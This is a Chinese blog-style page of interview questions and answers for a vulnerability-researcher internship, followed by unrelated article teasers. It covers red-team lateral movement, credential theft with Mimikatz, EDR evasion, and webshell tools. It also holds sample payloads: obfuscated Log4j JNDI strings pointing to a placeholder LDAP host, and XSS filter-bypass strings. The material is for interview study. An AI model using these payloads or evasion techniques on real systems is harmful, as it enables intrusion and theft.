2025年渗透测试面试题总结- 深某服-漏洞研究员实习(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
深信服-漏洞研究员实习
1. 在XX实习时做了什么
2. 渗透测试的思路简单描述
3. 护网中承担什么角色
4. 红队一些攻击思路
5. 拿下系统如何横向
6. Log4j漏洞(CVE-2021-44228)研究
7. 内存码(Shellcode Loader)了解
8. 冰蝎、哥斯拉工具分析
9. 攻击队研究重点
10. 擅长漏洞/攻击方向
11. Shiro反序列化漏洞解析
12. Bypass方法示例
深某服-漏洞研究员实习
在XX实习时做了什么渗透测试的思路简单描述护网中承担什么角色红队一些攻击思路拿下系统如何横向前段时间的那个log4j有研究吗,可以简单说一下吗(接上)有哪些混淆绕过的方法内存码有没有了解冰蝎、哥斯拉这些工具有没有了解过做攻击队的时候有没有研究过什么攻击,比如研究一些工具还是魔改什么的那么多漏洞和攻击,比较擅长哪一个说下shiro反序列化的形成原因、利用链对一些bypass的方法有没有了解过,什么姿势可以简单介绍一下。1. 在XX实习时做了什么
在实习期间,主要围绕渗透测试、漏洞挖掘和攻防实战展开:
- 渗透测试项目:参与内/外部资产的安全评估,包括Web应用、API接口和内部系统的漏洞扫描(如SQL注入、XSS、逻辑漏洞等)。
- 漏洞挖掘与利用:针对Java框架(Shiro、Fastjson)、中间件(WebLogic、Tomcat)进行代码审计,复现历史漏洞并尝试发现新攻击面。
- 红蓝对抗支持:协助防守方分析攻击流量,溯源攻击链;同时模拟攻击队编写PoC工具,绕过WAF规则。
- 报告输出:整理漏洞复现步骤、风险等级和修复方案,推动开发团队修复高危漏洞。
2. 渗透测试的思路简单描述
渗透测试核心流程分五阶段:
- 信息收集:
- 子域名枚举(如
subfinder)、端口扫描(nmap)、指纹识别(Wappalyzer)。- 敏感信息泄露(GitHub源码、备份文件、配置文件)。
- 漏洞扫描与验证:
- 工具自动化扫描(AWVS、Nessus),结合手动验证误报(如逻辑漏洞、未授权访问)。
- 权限提升:
- 通过弱口令、反序列化、文件上传等漏洞获取初始立足点。
- 横向移动:
- 利用内网协议(SMB、WinRM)、凭证窃取(Mimikatz)扩大控制范围。
- 报告输出:
- 输出漏洞详情、攻击路径图及修复建议。
3. 护网中承担什么角色
- 攻击队角色:
- 突破入口:针对暴露面(Web应用、VPN、邮件系统)进行漏洞利用(如Log4j、OA系统RCE)。
- 横向渗透:通过内网代理(如reGeorg)和口令爆破(Hydra)拿下域控或核心数据库。
- 防守经验:
- 分析攻击流量特征(如冰蝎流量加密),优化WAF规则;
- 协助处置应急事件(如Webshell查杀、日志溯源)。
4. 红队一些攻击思路
初始入侵阶段:
- 鱼叉攻击:钓鱼邮件投递恶意文档(CVE-2021-40444)或伪装升级包(供应链污染)。
- 0day/Nday利用:针对未修复的高危漏洞快速突破(如Confluence RCE)。
横向扩展阶段:
- 凭证窃取:通过Mimikatz提取内存密码、Kerberoasting攻击获取服务账户哈希。
- 权限维持:部署隐蔽后门(如计划任务、WMI事件订阅)、黄金票据伪造域管权限。
5. 拿下系统如何横向
横向移动关键步骤:
- 信息收集:
- 内网资产扫描(Netsparker、Fscan),定位高价值目标(数据库、域控)。
- 凭证利用:
- Pass-the-Hash(NTLM哈希传递)、Pass-the-Ticket(Kerberos票据转发)。
- 协议漏洞:
- 利用SMBGhost(CVE-2020-0796)、Zerologon(CVE-2020-1472)直接提权。
- 隐蔽通道:
- 通过DNS隧道(dnscat2)、HTTP代理(Chisel)绕过网络隔离。
6. Log4j漏洞(CVE-2021-44228)研究
原理:Log4j 2.x版本解析日志时,未对
${jndi:ldap://xxx}等表达式过滤,导致JNDI注入,远程加载恶意类触发RCE。混淆绕过方法:
- 环境变量注入:
${${env:XXX:-j}ndi:ldap://xxx}(利用默认值覆盖)。- Lower/Upper关键字:
${jNdi:ldap://xxx}(大小写绕过)。- 嵌套表达式:
${${::-j}ndi:ldap://xxx}(特殊符号替换)。- 绕过高版本限制:利用上下文变量(如
${ctx:xxx})拼接攻击载荷。
7. 内存码(Shellcode Loader)了解
- 原理:将恶意代码(如Cobalt Strike的Beacon)直接加载到内存中执行,避免文件落地。
- 常见技术:
- 反射型DLL注入:通过
VirtualAlloc分配内存并执行。- 进程镂空(Process Hollowing):替换合法进程内存内容(如svchost.exe )。
- 对抗检测:通过加密壳(如AES)、API调用混淆(如Syscall直接调用)绕过EDR。
8. 冰蝎、哥斯拉工具分析
- 冰蝎(Behinder):
- 特点:动态密钥加密流量(AES+随机Key),支持HTTP/HTTPS隧道。
- 检测难点:特征为固定
UA头和Content-Type: application/octet-stream。- 哥斯拉(Godzilla):
- 优势:支持更多加密算法(如RSA)、模块化功能(内网穿透、端口扫描)。
- 绕过技巧:修改默认密钥、自定义HTTP头字段混淆流量。
9. 攻击队研究重点
- 工具武器化:
- 魔改C2框架(如Cobalt Strike Aggressor脚本),适配目标环境。
- 开发轻量级漏洞利用工具(如Fastjson一键利用)。
- 流量混淆:
- 对Webshell流量进行分段编码(如Base64+Hex混合)、添加垃圾数据。
- 供应链攻击:
- 研究第三方组件漏洞(如npm包、Docker镜像投毒)。
10. 擅长漏洞/攻击方向
反序列化漏洞:
- 擅长点:Java反序列化链构造(如CommonsBeanutils、CC链)、内存马注入。
- 实战案例:通过Shiro RememberMe字段反序列化打入内网,结合JNDI注入加载内存马。
11. Shiro反序列化漏洞解析
形成原因:
- Shiro使用硬编码AES密钥加密
RememberMe字段,攻击者通过伪造Cookie触发反序列化。- 反序列化入口点:
AbstractRememberMeManager#decrypt方法。利用链(以CommonsBeanutils为例):
- 触发点:恶意Cookie → AES解密 → 反序列化 → 调用
BeanComparator.compare()。- 利用链:通过
PropertyUtils.getProperty()触发任意Getter方法,最终执行TemplatesImpl加载字节码。
12. Bypass方法示例
常见绕过姿势:
- 编码混淆:URL编码、Unicode转义(如
<img src=x onerror=alert(1)>→\u003cimg\u0020src=x...)。- 关键字分割:利用注释符或拼接(如
<svg/onload=alert``(1)>)。- 协议特性:
- HTTP参数污染(HPP):
param=1¶m=payload触发解析差异。- 特殊符号:
${1+1}在Thymeleaf等模板引擎中执行表达式。
相关文章:
2025年渗透测试面试题总结- 深某服-漏洞研究员实习(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 深信服-漏洞研究员实习 1. 在XX实习时做了什么 2. 渗透测试的思路简单描述 3. 护网中承担什么角色 4…...
(13)Anaconda 安装配置详解
1. Anaconda 简介 Anaconda 是一个用于科学计算和数据分析的 Python 发行版,它集成了 Python 解释器、大量常用的科学计算库以及强大的包管理工具。 2. Anaconda 主要特点 丰富的库集合:包含了超过 1500 个用于科学计算、数据分析、机器学习等领域的常用 Python 库,例如 N…...
MWC 2025 | 移远通信大模型解决方案加速落地,引领服务机器人创新变革
随着人工智能、大模型等技术的蓬勃发展,生成式AI应用全面爆发。在此背景下,服务机器人作为大模型技术在端侧落地的关键场景,迎来了前所未有的发展机遇。 作为与用户直接交互的智能设备,服务机器人需要应对复杂场景下的感知、决策和…...
[内网安全] Windows 域认证 — Kerberos 协议认证
🌟想系统化学习内网渗透?看看这个:[内网安全] 内网渗透 - 学习手册-CSDN博客 0x01:Kerberos 协议简介 Kerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过…...
[Computer Vision]实验七:图像检索
目录 一、实验内容 二、实验过程 2.1 准备数据集 2.2 SIFT特征提取 2.3 学习“视觉词典”(vision vocabulary) 2.4 建立图像索引并保存到数据库中 2.5 用一幅图像查询 三、实验小结 一、实验内容 实现基于颜色直方图、bag of word等方法的以图搜…...
C++之thread_local变量
C之thread_local变量_c threadlocal-CSDN博客 thread_local简介 thread_local 是 C11 为线程安全引进的变量声明符。表示对象的生命周期属于线程存储期。 线程局部存储(Thread Local Storage,TLS)是一种存储期(storage duration),对象的存储是在…...
【国产Linux | 银河麒麟】麒麟化龙——KylinOS下载到安装一条龙服务,起飞!
🗺️博客地图 📍一、下载地址 📍二、 系统安装 本文基于Windows操作系统vmware虚拟机安装 一、下载地址 官网:产品试用申请国产操作系统、麒麟操作系统——麒麟软件官方网站 下载自己需要的版本,完成后,…...
js中的execCommand怎么复制富文本内容解析)
(接“使用js去复制网页内容的方法”)js中的execCommand怎么复制富文本内容解析
document.execCommand(copy) 是传统的剪贴板操作方法,但它主要用于复制纯文本内容。如果你想复制富文本内容(包括 HTML 标签和样式),需要结合一些技巧来实现。以下是具体方法: 方法:通过创建隐藏的富文本元…...
npm ERR! code 128 npm ERR! An unknown git error occurred
【问题描述】 【问题解决】 管理员运行cmd(右键window --> 选择终端管理员) 执行命令 git config --global url.“https://”.insteadOf ssh://git cd 到项目目录 重新执行npm install 个人原因,这里执行npm install --registryhttps:…...
解决Leetcode第3470题全排列IV
3470.全排列IV 难度:困难 问题描述: 给你两个整数n和k,一个交替排列是前n个正整数的排列,且任意相邻两个元素不都为奇数或都为偶数。 返回第k个交替排列,并按字典序排序。如果有效的交替排列少于k个,则…...
MyBatis 配置文件核心
MyBatis 配置文件核心标签解析 以下是针对你的笔记中的三个核心标签的详细解析,帮助你全面理解它们的用途和配置逻辑。 1. properties 标签:动态加载外部配置 功能 将环境相关的配置(如数据库连接、密钥等)与 MyBatis 核心配置…...
bert模型笔记
1.各预训练模型说明 BERT模型在英文数据集上提供了两种大小的模型,Base和Large。Uncased是意味着输入的词都会转变成小写,cased是意味着输入的词会保存其大写(在命名实体识别等项目上需要)。Multilingual是支持多语言的࿰…...
微信小程序接入deepseek
先上效果 话不多说,直接上代码(本人用的hbuilder Xuniapp) <template><view class"container"><!-- 聊天内容区域 --><scroll-view class"chat-list" scroll-y :scroll-top"scrollTop":…...
推荐算法和推荐系统入门第一趴
以下是推荐系统技术总结的架构梳理和建议表达思路: 从原理到生产环境:推荐系统核心技术与实战代码解析 一、推荐算法的演进图谱 传统算法三剑客 ![推荐系统算法分类示意图] (使用Mermaid绘制算法分类关系图,清晰展示技术演进&am…...
unity pico开发 四 物体交互 抓取 交互层级
文章目录 手部设置物体交互物体抓取添加抓取抓取三种类型抓取点偏移抓取事件抓取时不让物体吸附到手部 射线抓取交互层级 手部设置 为手部(LeftHandController)添加XRDirInteractor脚本 并添加一个球形碰撞盒,勾选isTrigger,调整大小为0.1 …...
基于深度学习的青花瓷图像检索系统开发与实现
目录 1.研究背景与目的 1.1课题背景 1.2研究目的 二、调研资料情况 2.1图像分割研究现状 2.2图像检索调研 2.2.1选择深度学习进行检索的原因及优势 2.2.2基于深度学习的图像检索技术的发展 2.2.3基于深度学习的图像检索的研究重点 2.3基于深度学习的图像检索方法调研 …...
—— Vuex 的使用)
uniapp 系统学习,从入门到实战(八)—— Vuex 的使用
全篇大概 4500 字(含代码),建议阅读时间 30min 📚 目录 Vuex核心概念解析在 UniApp 中集成Vuex状态管理与数据共享实践总结 一、Vuex 核心概念解析 1.1 什么是状态管理 在跨多组件的大型应用中,不同页面/组件需要共享和修改相同数据时&am…...
Vue Hooks 深度解析:从原理到实践
Vue Hooks 深度解析:从原理到实践 前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家!点我试试!! 文章目录 Vue Hooks 深度解析:从原理到实践一、背景…...
django中序列化器serializer 的高级使用和需要注意的点
在 Django REST framework(DRF)中,序列化器(Serializer)是一个强大的工具,用于将复杂的数据类型(如 Django 模型实例)转换为 Python 原生数据类型,以便将其渲染为 JSON、XML 等格式,同时也能将接收到的外部数据反序列化为 Django 模型实例。以下将介绍序列化器的高级…...
靶场(二)---靶场心得小白分享
开始: 看一下本地IP 21有未授权访问的话,就从21先看起 PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Cant get dire…...
Java并发编程:CompletableFuture实战
Java并发编程:CompletableFuture实战 引言 Java 8引入的CompletableFuture是现代异步编程的重要工具,它不仅解决了Future的局限性,还提供了丰富的API用于组合、转换和处理异步结果。相比传统的Future,CompletableFuture支持流式调…...
)
告别混乱信号!用CANdb++ Editor从零搭建汽车CAN网络DBC文件(保姆级图文教程)
告别混乱信号!用CANdb Editor从零搭建汽车CAN网络DBC文件(保姆级图文教程) 在汽车电子开发领域,CAN总线如同神经脉络般贯穿整车系统。我曾参与过一个新能源整车项目,由于早期缺乏规范的DBC文件,不同ECU厂商…...
JVM调优实战:让你的服务性能提升50%
一、背景 线上一个核心订单服务,QPS 3000左右,经常出现接口超时告警。监控显示: 平均RT: 180ms(要求<100ms)Full GC频率: 每天20次,每次STW 1.5sCPU使用率: 峰值85%服务规格: 8C16G,堆内存…...
DriveBench:面向真实驾驶场景的长序列多智能体交互基准测试框架
1. 项目概述:从“世界基准”到“驾驶基准”的演进如果你在自动驾驶或者计算机视觉领域摸爬滚打过几年,一定对“基准测试”(Benchmark)这个词又爱又恨。爱的是,它提供了一个相对公平的擂台,让不同算法、不同…...
如何快速提升游戏帧率:OpenSpeedy游戏加速优化终极指南
如何快速提升游戏帧率:OpenSpeedy游戏加速优化终极指南 【免费下载链接】OpenSpeedy 🎮 An open-source game speed modifier. 项目地址: https://gitcode.com/gh_mirrors/op/OpenSpeedy 你是否厌倦了游戏卡顿和掉帧?OpenSpeedy是一款…...
开源银行API模拟器Bankr Buddy:金融科技开发的本地化测试解决方案
1. 项目概述:一个为开发者准备的银行API模拟器如果你正在开发一个需要与银行账户数据打交道的应用,无论是个人财务管理工具、预算分析软件,还是企业级的财务聚合服务,你肯定遇到过同一个难题:如何在不触碰真实用户敏感…...
GURU-Ai:面向开发者的AI命令行工具集,提升代码理解与运维效率
1. 项目概述:一个面向开发者的AI助手工具集最近在GitHub上看到一个挺有意思的项目,叫“Guru322/GURU-Ai”。光看名字,你可能会觉得这又是一个大而全的AI模型或者聊天机器人,但点进去仔细研究后,我发现它的定位其实非常…...
解密VideoDownloadHelper:开源浏览器插件的智能视频提取技术
解密VideoDownloadHelper:开源浏览器插件的智能视频提取技术 【免费下载链接】VideoDownloadHelper Chrome Extension to Help Download Video for Some Video Sites. 项目地址: https://gitcode.com/gh_mirrors/vi/VideoDownloadHelper 当你在浏览微博、秒拍…...
Go语言SDK开发实战:为AI编程助手Cursor构建高效API客户端
1. 项目概述:一个为AI编程助手Cursor定制的Go语言SDK如果你和我一样,日常重度依赖Cursor这类AI编程助手来提升开发效率,同时又是个Go语言的忠实拥趸,那你肯定遇到过这样的场景:想用Go写个脚本,自动化处理一…...
基于CircuitPython与NeoPixel打造可编程LED亚克力灯牌:从硬件选型到代码实现
1. 项目概述:打造你的专属可编程光之铭牌在创客和电子爱好者的世界里,总有一些项目能完美地融合软件编程的灵活性与硬件制作的实体成就感。今天要分享的,就是这样一个让我爱不释手的小玩意儿:一个基于CircuitPython和NeoPixel的可…...